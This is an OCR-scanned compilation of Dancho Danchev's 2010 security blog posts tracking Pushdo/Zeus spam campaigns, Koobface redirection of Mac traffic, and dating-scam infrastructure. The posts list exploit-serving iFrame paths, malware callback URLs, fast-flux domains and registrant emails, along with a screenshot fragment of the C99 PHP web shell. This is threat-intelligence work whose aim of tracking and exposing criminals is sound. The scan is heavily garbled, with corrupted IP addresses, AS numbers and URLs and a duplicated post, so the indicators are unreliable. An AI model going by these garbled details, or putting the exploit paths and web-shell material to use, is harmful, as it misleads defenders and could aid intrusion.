

nsl pdsproperties. com 


" nsi snup-up.net 
AS? 


vu ns2.pdsproperties. com 


nhs2. snup-up.net 


Last week’s [7]OWA-themed Zeus-serving spam campaign courtesy of the Pushdo botnet, 
has not just resumed, but is continuing to serve client-side exploits (CVE-2007-5659; CVE- 
2008-2992; CVE-2009-0927) to anyone visiting the spammed web sites through an iFrame 
embedded on all of them. Such traffic optimization tactics are nothing new, since the botnet 
master is anticipating the fact that the visitor that clicked on the link, may not be that stupid 
the next time, so attempting to serve the malware without any kind of interaction on his behalf 
through client-side exploits is the tactic of choice. 


Let’s dissect the campaign, list all of the currently active fast-fluxed domains, the name 


servers of notice, the client-side exploit serving structure, and the Russian Brides scam 
domains spamvertised over the last few days. 
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' 
leptprs.ne.kr 
\ 
\ 
\ 


NS 


gy pe 12:176.0.0012 ——————*3-_—> ass7066 
112.187.222.76 


_ 114.27.0.016 ——_ Beige 253462 
123.237.72.0/21 ———————*_ asiglol 
ad 


123.237.77.3 


114.27.33.183 


ntthyo377185.tkyo.nt (th ppp .infoweb.ne jp 


& 


125.0.40.185 ——HEL—__g 125.0.0.0/15 ———_____4&_-m as2510 
196.82103166 ——fL___y 196 92.96.0/21 ———————“2-m> 510620 
188.129.179.24 ——MEL gy 198.129.228.018 ——-_-__—AS_ge 4520771 
189.104.1137 ——H&L__ge 199.104.0019 ————_—___—“S_-m» s7738 
189.220.41.195 ——_HEL gs 189 220.32.020 —_—_—— tng 4528554 
190142160194 ——H&L___s 190,142.160.0722 ————_—_—_—“S-m» asz1926 
201.42.196.214 ——HEL gy 291 42.00/16 

201.43.66.196 ——“EL_____s 291 4200/5 ——__-> AS27699 
189.19.13795 ——HfL__ ys sg is 0.06 

$9.103.87.7 ———_WEL___ gs 659.103.8724 ———_____—_Ai-g» 4517557 
61.6299.36 ——“L____» 6162.64.18 —————_—_—*- s19182 
89.138.12299 ——WEL gy 6 99:138.00/15 ——__4i_-» as1690 

nek 


ns2.snup-up.net 
NET 


nsl.aj-realtynet A as AS? 


nsl.snup-up.net 


Active fast-fluxed domains part of the campaign: 
leptprs.co .kr - Email: wawddhaepny@yahoo.com 
leptprs .kr - Email: wawddhaepny@yahoo.com 
leptprs.ne .kr - Email: wawddhaepny@yahoo.com 
leptprs.or .kr - Email: wawddhaepny@yahoo.com 
oki8uuu.co .kr - Email: wawddhaepny@yahoo.com 
ui7772.co .kr - Email: jn.hadler@jkh.org.uk 
ui7772 .kr - Email: jn.hadler@jkh.org.uk 
ui7772.ne .kr - Email: jn.hadler@jkh.org.uk 
ui7772.or .kr - Email: jn.hadler@jkh.org.uk 

ui777f .kr - Email: jn.hadler@jkh.org.uk 

ui777f.ne .kr - Email: jn.hadler@jkh.org.uk 
ui777f.or .kr - Email: jn.hadler@jkh.org.uk 
ui777fne .kr - Email: jn.hadler@jkh.org.uk 
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ui777I.co .kr - Email: jn.hadler@jkh.org.uk 
ui777p.co .kr - Email: jn.hadler@jkh.org.uk 
ui777p .kr - Email: jn.hadler@jkh.org.uk 

ui777p.ne .kr - Email: jn.hadler@jkh.org.uk 
ui777p.or .kr - Email: jn.hadler@jkh.org.uk 


122:165.14,77, ———MEL__g» 112.160.0013 ————_—_—_“2___m asivé6 
112.201.126.156 ——MEL gs 112.201.96.0/19 ——__42-—_—-m As9299 
117.199.241.193 ——MEL__g 117.199.240.0/20 
A 
AS 
he 117.200.59.131 ——WEL ge 117, 200.48.0/20 
AS 
117.201.7104 ———HEL_____» 117.201.0.020 
AS 
4 117.204.163.105 ——“iL ge 117,204.160.0/20 
AS 
127.241.2165 ———HEL—___-ge 117.241 208.0/20 
Pe 
127.242.112.174 ——HE—————m™ 117.242.112.020 
H 
$9.92.25197 ————WEL gy 69 92. 240.0/20 
! 
59.93.6728 ———H&l__» 5993.64.020 
a 117.195.230.486 ———WEL gy 117.195.224.020 
i f 117.197.121.177 ——HEL—__—-® 117.197.112.020 
< 119.152.151.201 ——WiL ge 119.152.148.022 ——_—_————A gm 4517557 
A 
187.8953.46 ———HEL__» 197.99.0.016 ————_—_—_“2___» aszésoo 


202.157.7115 ——“2ge 94202157007215.ul7.ken'tune jp 


eT 
ns ns1.elkins-reattynet 202.157.0.018 ——=_ AS gy 0523790 
“" ns2.elkins-reaaynet 173.212,209.26 ————“ELg 173.212.192.018 ——“S-> asz21783 
, ns2.raddoorcom 721.123.1761 ——_—_— EL gs 71123.16.0120 ——Ane-ge 4519262 
A 
nslraddoorcom wut 
: = AS? 


ne.kr 


DNS servers of notice: 

nsl.raddoor .com - Email: figarro77@gmail.com 
nsl.snup-up .net - Email: dietsnak@socialworker.net 
ns1.aj-realty .net - Email: support@aj-realty.net 
ns1.aj-administration .com - Email: manager@mack.net 
ns1.aj-talentsearch .com - Email: supp@mail.net 
nsl.eurobankfinance .net - Email: termer@counsellor.com 
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nsl,hetn91 .com - Email: astrix@aol.com 
ns1.personnel-aj .com - Email: KimMIngram@aol.com 
ns1.nitroexcel .net 

nsl.fredoms .com 

ns1.ajstaffing .net 

ns1.angel-death .net 

ns1.aj-estate .com 

ns1.aj-realtors .com 

nsl.pdsproperties .com 

ns1.groupswat .com 


Upon execution, [8]settings-file.exe (Trojan-Spy.Win32.Zbot.adsy), phones back to 109.123.70 
.97/fh3245sq/config.bin. Detection rate for pdf.pdf ([9]Exploit-PDF.ac) and file.exe ([10]Tro- 
jan.Win32.Riern). The structure of the iFrame is as follows: 


- atthisstage . 


- atthisstage 
- atthisstage 
- atthisstage 
- atthisstage 


com/uksp/in.php - 84.45.45.135 - Email: soakes@soakes.com 


.com/uksp/jquery.jxx 
.com/uksp/xd/pdf.pdf 
.com/uksp/load.php 
.com/uksp/file.exe 
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Claude's space 


Profil Blog 


| vocawotah 
Russian Girls! 
| Welce "to the 
est ssian brides online 
Profikdetads m2ege 


Netzwerk 


Russian Brides spamvertised domains part of an affiliate network: 
toolbarsunited .com - Email: soft.tj@gmail.com 

2006jubilee .com - Email: soft.tj}@gmail.com 

avtofo .org - Email: flarnes@gmail.com 

lovesexdatings .com - Email: kauplus@li.ru 

stars-dating .com - Email: kauplus@li.ru 

avtofo.com .ua 

dinenyc .net 


The best selection on Russian brides 


100% checked 


cid-f5f40ef1f5210d08.spaces .live.com 

cid-c1b015ffe1b44573.spaces .live.com 
cid-b78f4f23e27d2b45.spaces .live.com 
cid-8d3413073f537740.spaces .live.com 
cid-205046cf66900102.spaces .live.com 


If you want to know more the inner workings of the Pushdo/Cutwail botnet, consider go- 
ing through the [11]Pushdo / Cutwail - An Indepth Analysis report. 


Related posts: 
[12]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 
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[13]Pushdo Injecting Bogus Swine Flu Vaccine 

[14]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 
[15]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[16]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [17]Dancho Danchev’s blog. 


1. ttp://www.virustotal.com/analisis/bebf6c8b3c6a29acfb7d51022c0948dalec2e83d3c8aa4b4c1d27cca901fd631- 1263 


2 
- http: //ddanchev. blogspot . com/2010/01/out1look-web-access-themed~ spam~ campaign htm] 
http: //garwarner .blogspot.com/2010/01/this-week-in-avalanche-zbot-zeus-bot .htm 
_aceps: //eei wer con/avivra/svatus/TT20194059 

_ cups: //ewivver con/avivra/svatus/T721711447 

_hvtp://adanchey. blogspot .cou/2010/01/outlook-web-access~thened- span canpaiga bial 
_"netp://snvirustotel.con/anal vis /€62695¢"a6081db35Se5606«b6bce9af6853475647 NT Be 687i addi TeB- 12658 


9. ttp://www.virustotal.com/analisis/8f15b24627621b74df 7af 103f£e2fef9908728a3c0bd1la2af df 83947 e980251cc- 1263, 
10. http://www.virustotal.com/analisis/433accd7£258c1813c6c6310a4a2347ee45530db839bea2663f59f 2ccf6d3be3- 1263, 


11. http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/study_of_pushdo.pdf 
12. http: //ddanchev.blogspot .com/2010/01/outlook-web-access-themed-spam- campaign. htm 


. http: //ddanchev.blogspot .com/2009/10/ongoing-fdic-spam-campaign-serves-zeus. htm 


16. http://ddanchev.blogspot .com/2009/07/multitasking-fast-flux-botnet-that.htm 
17. http: //ddanchev.blogspot.com/ 


6.1.7 Follow Me on Twitter! (2010-01-18 19:05) 


Are you on Twitter? If so, [L]consider following my tweets, or if you’re not using it you can 
always [2]subscribe to the RSS feed. 


1. http: //twitter.com/danchodanche 
2. http: //twitter.com/statuses/user_timeline/19680610.rss 
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6.1.8 Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side 
Exploits (2010-01-26 09:34) 


Facebook helps you connect aed share with the people in your Me. 


Facebook Login 


You must leg in to update your Facebook account, 


tmad 


Porvored 
7 keep me loggedin 


Le es 


Continuing [1]the Pushdo coverage from last week, the "Your AOL Instant Messenger account 
is flagged as inactive" "[2]lor the latest update for the AIM" themed campaign from the 
weekend, has once again returned to a well known theme, namely, the "[3]Facebook Update 
Tool" spam campaign. 


The botnet masters have introduced several new name servers - domain suspension is 
pending - but continue using the same IP embedded on all the pages, for serving the client- 
side exploits, with a slight change in the directory structure. 


- Sample subject: Facebook Update Tool 

- Sample body: "Dear Facebook user, In an effort to make your online experience safer 
and more enjoyable, Facebook will be implementing a new login system that will affect all 
Facebook users. These changes will offer new features and increased account security. Before 
you are able to use the new login system, you will be required to update your account. Click 
here to update your account online now. If you have any questions, reference our New User 
Guide. Thanks, The Facebook Team" 


2993 


- Sample URL: facebook.com.ddeassrq .vc/usr/LoginFacebook.php?ref 

- Detection rates for scripts/crimeware/exploits: [4]File.exe (phones back to the currently 
down nekovo .ru/cbd/nekovo.bri); [5]IE.js; [6]IE2.js; [7]nowTrue.swf; [8]pdf.pdf 

- Sample iFrame exploitation structure: 109.95.114 .251/us01d/in.php 

- 109.95.114 .251/us01d/jquery.jxx 

- 109.95.114 .251/us01d/xd/pdf. pdf 

- 109.95.114 .251/us01d/load.php 

- 109.95.114 .251/us01d/file.exe 


114.142.212.137 ——WEL-g 114142192019 ——AS-ge aso246 
116.681.4466 ——“&_- 116.90.0.014 ——AS-m as2510 
123.112.1113 ——“S—pm 123.112.0018 ——“S—m asasos 
189.104.93.39 ——“EL-ge 199,104.64.0/19 ——“S—g as7738 
190.140.29.142 ——“H&L-g> 190.140.0.016 ——“S-g s19909 
190.142.113.210 ——HfL—-ge 190.142.0019 ——At-ge 4521826 
y 190.160.226.227 ——WEE_gy 190.160.192.018 ——A&-ge 4S22047 


189.193.146.179 ——HEL_-g 199.192.0.013 - 


AS13999 
201.165.195.77 ——MEL_-m 201.164.0015 


C teasaeave > - 190.245.121.441 ——“E-pe 190.245.6408 ——S-p asio3is 


A 201.13.148.100 ——“H&L ge 201.13.0.0/16 


as 
AS27699 


\ cS 201.26.125.145 ——WEL gs 201.26.0.0/17 
201.244.253.55 ——MEL-g 201.244.240.020 ——AS-g aS19429 
ns 


209.88.71.166 ——“El_» 209.98.71.024 ——“S-m asi1139 


ns2.avaiiname. net 


ns ns2.sorbauto.com 
AS? 


ns 1 .availname.net 


nsl.sorbauto.com 


- Sample typosquatted and currently active domains: 
ddeasaeq .vc - Email: mspspaceki@mad.scientist.com 
ddeasuqq .vc - Email: mspspaceki@mad.scientist.com 
ddeassrq .vc - Email: mspspaceki@mad.scientist.com 
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ddeasutq .vc - Email: mspspaceki@mad.scientist.com 
ddeasauq .vc - Email: mspspaceki@mad.scientist.com 
ddeasqwg .vc - Email: mspspaceki@mad.scientist.com 
ddeasqyq .vc - Email: mspspaceki@mad.scientist.com 


reeesassf .la - Email: palatalizefxt@popstar.com 
ukgedsa.com .hn - Email: zmamarc689@witty.com 
ukgedsc.com .vc - Email: zmamarc689@witty.com 
ukgedse.com .hn - Email: zmamarc689@witty.com 
ukgedsg.com .vc - Email: zmamarc689@witty.com 
ukgedsh.com .vc - Email: zmamarc689@witty.com 
ukgedsi .hn - Email: zmamarc689@witty.com 


ukgedsr.com.sc 


| 


AS 
———— 4 r ——_+_@ A 
114.142.212.137 114.142.192.019 $9246 


, as 
116.891.4486 ——BEL————>_116.80.0.014 ————— > AS2510 


AS 
117.200.53.27 ME 117.200.4820 ————  ASISIZI 


— 
123.123.1989 ——_ME—_ a 123.112.0.0118 AS4808 


189.193.146.179 — EL —<_ 189.192.0.0/13 ——_—_4i_» AS13999 
189.16.189.86 et  169.18.0.0/16 


0 BET «201.26.0. 017 AS + 


-78-ll- a 
1897801143 ——— 189-78-11-143.dsitelesp.netbr 


189,78.0.0/17 
a 

190.140.0016 —————“2-g» AS19809 
ete 


190.142.0.019 ———_—“t-g» s21926 


190.140.29.142 
190.142.113.210 


190.245.121.41 
t 


f a 
190.25.79.28 190.245.64.018 ——E-ge 4510319 
ces, 


AS 
200.985.250.127 190.25.64.20 ——-_—_—_—_—“2ge AS19429 


te 
4.00 AS 5 
201.149.249.238 200.95.224.019 ————__—“2-g AS27672 
a 
, AS 
919 966.20.90 201.149.192.0/18 ——___AS-_-ge asso4 


7 


211.255.0.0/19 a AS38661 
nsl.drinckclub.com 


ns]. wanssubmat net NET 
ns$2.dtinckelub.com 
ns2.tanssubmatnet 


com.s¢ 
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ukgedsq.com .hn - Email: zmamarc689@witty.com 
ukgedsr.com .sc - Email: zmamarc689@witty.com 
ukgedst.com .sc - Email: zmamarc689@witty.com 
ukgedsu.com .vc - Email: zmamarc689@witty.com 
ukgedsv.com .vc - Email: zmamarc689@witty.com 
ukgedsy.com .vc - Email: zmamarc689@witty.com 


- Name servers of notice: 

nsl.availname .net - 204.12.229.89 - Email: Larimore@yahoo.com 
nsl1.sorbauto .com - 204.12.229.89 - Email: xtrai@email.com 
nsl.worldkinofest .com - Email: tolosal965@snail-mail.net 
nsl.pdsproperties .net - 92.84.23.138 - Email: PDSProperties@yahoo.com 
nsl.drinckclub .com - 94.23.177.147 - Email: excins@iname.com 
nsl1.transsubmit .net - 94.23.177.147 - Email: Alaniz@gmail.com 
nsl1.theautocompany .net - suspended 

ns1.24stophours .com - suspended 

ns1l.disksilver .net - suspended 


Thankfully, quality assurance is not taken into consideration in this campaign - the iFrame’s IP 
is already heavily blacklisted, and the crimeware sample itself attempts to phone back to a C 
&C that has been down for several days. 


The gang’s activities will be updated as they happen. 


Related posts: 

[9]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 
[10]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 
[11]Pushdo Injecting Bogus Swine Flu Vaccine 

[12]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 
[13]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[14]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [15]Dancho Danchev’s blog. 


1. http: //ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 


2. http: //garwarner .blogspot .com/2010/01/aol-update-spreads-zeus-zbot .htm 
4. ttp://www.virustotal.com/analisis/c362c51b41df7ff9c6a0f633a4fbd22cd399c91221d0ed66c9fcai879d3ba8ba- 12644 
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12. http://ddanchev. blogspot .com/2009/11/your-mailbox-has-been-deactivated-spam. html 


13. http://ddanchev. blogspot .com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.htm 


14. http://ddanchev. blogspot .com/2009/07/multitasking-fast-flux-botnet-that .htm 
15. http://ddanchev. blogspot .com/ 


6.1.9 Inside a Commercial Chinese DIY DDoS Platform (2010-01-26 14:28) 


With China in the focus of international fiasco (consider going through the [1]Google-China 
cyber espionage saga - FAQ) 


Related Chinese hacking/hacktivism coverage: 

[2]Localizing Open Source Malware 

[3]Custom DDoS Capabilities Within a Malware 

[4]Custom DDoS Attacks Within Popular Malware Diversifying 


[5]The FirePack Exploitation Kit Localized to Chinese 

[6]MPack and IcePack Localized to Chinese 

[7]Massive SQL Injection Attacks - the Chinese Way 

[8]A Chinese DIY Multi-Feature Malware 

[9]DIY Chinese Passwords Stealer 

[10]A Chinese Malware Downloader in the Wild 

[11]Chinese Hackers Attacking U.S Department of Defense Networks 
[12]Chinese Hacktivists Waging People’s Information Warfare Against CNN 
[13]The DDoS Attack Against CNN.com 


This post has been reproduced from [14]Dancho Danchev’s blog. Follow him [15]on Twitter. 


. http://blogs.zdnet.com/security/?p=5259 
. http: //ddanchev. blogspot .com/2007/09/localizing-open-source-malware.htm 


ttp://ddanchev.blogspot.com/2007/09/custom-ddos-capabilities-within-malware.htm 


. http: //ddanchev. blogspot .com/2008/05/custom-ddos-attacks-within-popular.htm 


1 
2 
3 
4 
5. http://ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 
6 
7 
8 
9 


ttp://ddanchev.blogspot.com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


ttp://ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks- chinese. html 


_hetp:/ /adanchev blogspot .con/2008/05/chinese-dsy-nulti~feature-nalvare tal 
_http:/ adanchey. blogepot .con/2001 /09/diy-chinese-passvords- stealer. neal 

10, jetp://adanchev blogspot .con/2007/09/chinese-nalare~ downloader in-wid, heal 
_http://adanchev.blogepot con/2006/09/chinese-hackers-attacking-us. htm 

_ http://adanchey. blogepot con/2008/04/chinese-hacktivists-vaging- peoples. Hal 
13, jetp://adanchev blogspot .com/2008/04/ddos-attack-againstcnncon. heal 
_netp://esiteer.con/danchodanched 


15 


6.1.10 Inside a Commercial Chinese DIY DDoS Platform (2010-01-26 14:28) 


With China in the focus of international fiasco (consider going through the [1]Google-China 
cyber espionage saga - FAQ) 
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Related Chinese hacking/hacktivism coverage: 

[2]Localizing Open Source Malware 

[3]Custom DDoS Capabilities Within a Malware 

[4]Custom DDoS Attacks Within Popular Malware Diversifying 


[5]The FirePack Exploitation Kit Localized to Chinese 

[6]MPack and IcePack Localized to Chinese 

[7]Massive SQL Injection Attacks - the Chinese Way 

[8]A Chinese DIY Multi-Feature Malware 

[9]DIY Chinese Passwords Stealer 

[10]A Chinese Malware Downloader in the Wild 

[11]Chinese Hackers Attacking U.S Department of Defense Networks 
[12]Chinese Hacktivists Waging People’s Information Warfare Against CNN 
[13]The DDoS Attack Against CNN.com 


This post has been reproduced from [14]Dancho Danchev’s blog. Follow him [15]on Twitter. 


. http: //blogs.zdnet .com/security/?p=5259 
. http: //ddanchev. blogspot .com/2007/09/localizing-open-source-malware.htm 


ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 


. http: //ddanchev. blogspot .com/2008/05/custom-ddos-attacks-within-popular.htm 


1 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 
6 
7 
8 
9 


ttp://ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


. http: //ddanchev. blogspot .com/2008/10/massive-sql-injection-attacks-chinese.htm 
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. http: //ddanchev. blogspot .com/2007/09/diy-chinese-passwords-stealer.htm 


10. http: //ddanchev.blogspot .com/2007/09/chinese-malware-downloader-in-wild.htm 
11. http: //ddanchev.blogspot.com/2006/09/chinese-hackers-attacking-us.htm 

. http: //ddanchev. blogspot . com/2008/04/chinese-hacktivists-waging-peoples. html 
13. http: //ddanchev blogspot . com/2008/04/ddos-attack-against-cnncom. html 
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6.2 February 


6.2.1 Summarizing Zero Day’s Posts for January (2010-02-01 22:34) 


Zonet 


ZNet Search: * 


Home News & Blogs Videos White Papers Downloads Reviews Popular - 


Ryan Naraine and Dancho Danchev 
2 Bess OB tmatse BMtwcsee Boe 


Pick a blog category ba | view 


ZDNet Must Read 
MS confirms 17-year-old Windows kernel flaw 


One day after a Google securty researcher released code to expose a flaw 
that affects every release of the Windows NT kernel -- from Windows NT 3.1 
(1993) up to erned » SmartPlanet 
Thought -peoveoturg 
January 27th, 2010 progressive seas 
ze aie 2 On diverse topics 
Report: 48% of 22 million scanned tecneelogy. 
computers infected with malware business, and fe, 
and matter to the 
world a large. Vist 
SmariPianet 


More from 18M 
Sponsored Links 


Saint Exploit 
Activity Integrated Penetration Testing and How te Drive 
Vulnerabaty Scanner from Sant Better Business 
r Outcomes with 
Trojan Remover Download Exceptional Web 
Free Trojan Scan. Winner of the Best Espenerxes 
Anti-Spyware, Rated $ Stars Download the 
eBook 


The recently released AP WG Ptesteng 

remds Report for Q3 of DOOD, detads record 
Peghts in mduple ptesPeng vectors, but also 
offers an mteresting observation on desktop 
crmeware efectiors. 


Accordayg to the report, the overall number of 
wtected computers (page 10) used m the Orne Busvess 
sarcle decreased compared to prewous ee SOA 
Quarters, however, 48.35% of the 22,754,847 scammed computers reman Integration 
wfected wth maiware Recent Entries Read the Whee 
Paper from 18M 

Afra Gespte that the crmeware/Dackong trojarrs evections shorty = 
decreased from Q2, over a mabon and a hall computers were infected eport oE- de cera phony : ed Linstog Decisions 

. om re and Information foe 
Orgarezatonal 
Performarne 


Read the Tom 


More detads 


Read the rest of thes entry « 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for January, 2010. 
You can also go through [2]previous summaries, as well as subscribe to my [3]personal RSS 
feed, [4]Zero Day’s main feed, [5]follow me or all of [6]ZDNet’s blogs on Twitter. 


Recommended reading - [7]Google-China cyber espionage saga - FAQ. 


01. [8]Baidu DNS records hijacked by Iranian Cyber Army 

02. [9]Haiti earthquake themed blackhat SEO campaigns serving scareware 
03. [10]Google-China cyber espionage saga - FAQ 

04. [11]And the most popular password is... 

05. [12]Bogus IQ test with destructive payload in the wild 

06. [13]Report: 48 % of 22 million scanned computers infected with malware 


This post has been reproduced from [14]Dancho Danchev’s blog. Follow him [15]on Twitter. 


1. http://blogs.zdnet.com/securit 
2999 


. http: //ddanchev. blogspot .com/2010/01/summarizing-zero-days-posts-for.html 


. http: //updates .zdnet.com/tags/danchotdanchev . html?t=0és=00=1&mode=rss 


2 

3 

4 
5 

6 

7. 

8 

9 
10. 


15. http://twitter.com/danchodanche 


6.2.2 How the Koobface Gang Monetizes Mac OS X Traffic (2010-02-02 18:07) 


Mac users appear to have a special place in the heart of the Koobface gang, since they’ve 
recently started experimenting with a monetization strategy especially for them - by compro- 
mising legitimate sites for the sole purpose of embedding them with the popular PHP backdoor 
shell C99 (Synsta mod), in an attempt to redirect all the Mac OS X traffic to affiliate dating 
programs, such as for instance [1]AdultFriendFinder. 


3000 


/public_htmt/ 
3.07 GB of 191.54 GO (64.25%) 
Server ip 


[Search] [Geffer] [Encoder] [Toots [Eval PHP code] [Self remove] [Cpanel Logs] 


The use of Synsta’s C99 mod is not a novel approach, the gang has been using for over an 
year and a half now. The original KROTEG injected script, is now including a "hey rogazi" 
message. "Hey rogazi" appears to be some kind of slang word (rogatstsi) for scooter driving 
Italian people. What’s also interesting to point out is that the Mac OS X redirection takes place 
through one of the few currently active centralized IPs from Koobface 1.0’s infrastructure - 
61.235.117.83. 


c99 v0.0.1 SYN-MOD [SYNSTA]; 


Software: Apache/ 2.2.11 (Unix) mod_ssi/2.2.11 OpenSSt/0.9.26-fips-rhelS mod_auth_passthrough/ 2.1 mod_bwlimited/ 1.4 F 


remPage/5.0 
2.6.18-128.1.10,e15 #1 SMP Thu May 7 10°8S:S9 EDT 2009 


(692) gid 32427(rj32) groupss32427(r92) 


® c99 v0.0.1 SYN-MOD [SYNSTA] #® 


ves-rhelS m potemeted {1.4 F 


wnet system, gassthrushell eve 


fons + oawet o_Open, Wh_alber, dl popen, skew source 
de32424(rj2) gide32427( 432) groups 


Swee Reet Oak 


eoret_ fh = "(Ohi Vicn) 
if Genet(S_CET[test']) BA $_ CET best} <= 1) 
4 

= Rettecr 


$e = Med gocript_trh: 
@ (eee(Sale]) <= i ROTES) ( 
pert *ROTES'; 


Make file 


Pree tk Nerilenrieed yay 


This very same IP (profiled in [2]August, 2009 and then in [3]September, 2009) was once 
brought offline thanks to the folks at China CERT, but quickly resumed operation, with Koob- 
face 1.0’s "leftovers" xtsd20090815 .com and kiano-180809 .com (domain was [4]serving 
client-side exploits in November 2009’s experiment by the Koobfae gang, followed by another 
one again hosted at 61.235.117.83) still parked there. 


¢ Go through related web shell backdoors, monetization posts: [5]A Compilation of Web 
Backdoors; [6]Monetizing Web Site Defacements; [7]Underground Multitasking in Action; 
[8]Monetizing Compromised Web Sites, [9]Web Site Defacement Groups Going Phishing 
3002 


Find Friends 


Hot members near Berlin looking to get laid 


——l ef 
em om} | 
owes EES 


AdultFriendFinder 
JOIN for FREE! F 


Moreover, this China-based IP (it even has a modest [10]Alexa pagerank) was also the 
centralized redirection point in Koobface 1.0’s scareware business model using popup.php to 
redirect to a systematically updated portfolio of scareware domains, and the first time ever 
that | came across to what [11]the gang is now publicly acknowledging as the "2008 ali baba 
and 40, LLC" team. 


[12]AS9394 (CRNET) itself is currently hosting the following active Zeus crimeware cam- 
paigns: 

[13]6alava .com - 61.235.117.70 - Email: necks@corporatemail.ru 

[14]sicha-linna .com - 61.235.117.77 - Email: stay@bigmailbox.ru 

[15]stopspaming .com - 61.235.117.70 - Email: bunco@e2mail.ru 

[16]ubojnajasila .net - 61.235.117.87 - Email: ubojnajasila.net@contactprivacy.com 


Here’s how the experiment looks like in its current form. Once the OS is detected, the 
redirection takes place through 61.235.117.83 /mac.php -> 61.235.117.83 /vvv.htm loading 
the following pages, using the gang’s unique campaign IDs at AdultFriendFinder: 


- BestDatingDirect .com/page _hot.php?page=random &did=14029 
- adultfriendfinder .com/go/page/ad ffadult gonzo?pid=p291351.sub2w954 &lang=english 
- adultfriendfinder .com/go/page/landing page geobanner?pid=g227362-ppc 
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bestdatingdirectcom 


besinetdate.com 


currentdating.com 


datefunclub.com 


enormousdating.com 


giantdating.com 


AS 
onlinelovedating.com ; < i 63.216.0.013 ———<—$>_—=—Jj AS3491 
63.218.226.67 a. 
worldbestdate.com f 63-218.226.67.static pecwglobal.net 


worlddatinghere.com 
www. bestdatingdirect.com 

www. datefunclub.com 
www.enormousdating.com 

wwew.giantdating.com 


www.worlddatinghere.com 


Parked on 63.218.226.67 - AS3491; PCCWGlobal-ASN PCCW Global is the rest of the dating 
site redirectors: 
bestdatingdirect .com 
bestnetdate .com 
currentdating .com 
datefunclub .com 
enormousdating .com 
giantdating .com 
onlinelovedating .com 
worldbestdate .com 
worlddatinghere .com 


This isn’t the first time that the Koobface gang is attempting to monetize traffic through 
dating affiliate networks. In fact, in November’s "[17]Koobface Botnet’s Scareware Business 
Model - Part Two" post emphasizing on the gang’s connection with blackhat SEO campaigns, 
the Bahama botnet and the [18]malvertising attacks at the web site of the New York Times, | 
also [19]pointed out on their connection with an [20]Ukrainian dating scam agency profiled 
before, whose botnet was also linked to [21]money mule recruitment campaigns in May, 2009. 
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[22]An excerpt is worth a thousand words: 


The historical OSINT paragraph mentioned that several of the scareware domains pushed 
during the past two weeks were responding to 62.90.136.237. This very same 
62.90.136.207 IP was hosting domains part of an [23]Ukrainian dating scam agency known as 
[24]Confidential Connections earlier this year, whose spamming operations were linked to a 


[25]botnet involved in money mule recruitment activities. 
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For the time being, the following dating scam domains are responding to the same IP: 
healthe-lovesite .com - Email: potenciallio@safe-mail.net 
love-isaclick .com - Email: potenciallio@safe-mail.net 
love-is-special .com - Email: potenciallio@safe-mail.net 
only-loveall .com - Email: potenciallio@safe-mail.net 
and-i-loveyoutoo .com - Email: potenciallio@safe-mail.net 
andiloveyoutoo .com - Email: menorstlO@yahoo.com 
romantic-love-forever .com - Email: potenciallio@safe-mail.net 
love-youloves .com - Email: potenciallio@safe-mail.net 
love-galaxys .com - Email: potenciallio@safe-mail.net 
love-formeandyou .com - Email: potenciallio@safe-mail.net 
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ifound-thelove .net - Email: potenciallio@safe-mail.net 
findloveon .net - Email: wersers@yahoo.com 
love-isexcellent .net - Email: potenciallio@safe-mail.net 


Could it get even more malicious and fraudulent than that? Appreciate my rhetoric. The 
same email (potenciallio@safe-mail.net) that was used to register the dating scam domains 
was also [26]Jused to register exploit serving domains at 195.88.190.247, [27]participate 
in phishing campaigns, and register a [28]money mule recruitment site for the non-existent 
[29]Allied Insurance LLC. (Allied Group, Inc.). 


Of course, the money made in process looks like pocket change compared to the money 
they gang makes through blackhat SEO, click fraud and scareware in general - go through 
the related posts at the bottom of the article. But since they’ve previously indicated what | 
originally anticipated they’ll do sooner or later, namely, start diversifying and experimenting 
due to the ever-growing compromised infrastructure, what they’ll do next on the Mac front is 
an issue worth keeping an eye on. 


Related Koobface gang/botnet research: 

[30]The Koobface Gang Wishes the Industry "Happy Holidays" 
[31]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[32]Koobface Botnet Starts Serving Client-Side Exploits 

[33]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[34]Koobface Botnet’s Scareware Business Model - Part Two 
[35]Koobface Botnet’s Scareware Business Model - Part One 
[36]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[37]New Koobface campaign spoofs Adobe’s Flash updater 
[38]Social engineering tactics of the Koobface botnet 

[39]Koobface Botnet Dissected in a TrendMicro Report 
[40]Movement on the Koobface Front - Part Two 

[41]Movement on the Koobface Front 

[42]Koobface - Come Out, Come Out, Wherever You Are 
[43]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [44]Dancho Danchev’s blog. Follow him [45]on Twitter. 


. https://secure.adultfriendfinder.com/p/partners/main.cgi 
. http: //ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 
. http: //ddanchev. blogspot .com/2009/09/koobface-botnets-scareware-business.htm 
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12. http: //www.google.com/safebrowsing/diagnostic?site=AS : 9394 


13. https://zeustracker.abuse.ch/monitor.php?host=6alava.com 


. https://zeustracker.abuse.ch/monitor.php?host=sicha-linna.com 


15. https://zeustracker.abuse.ch/monitor .php?host=stopspaming.com 
3006 


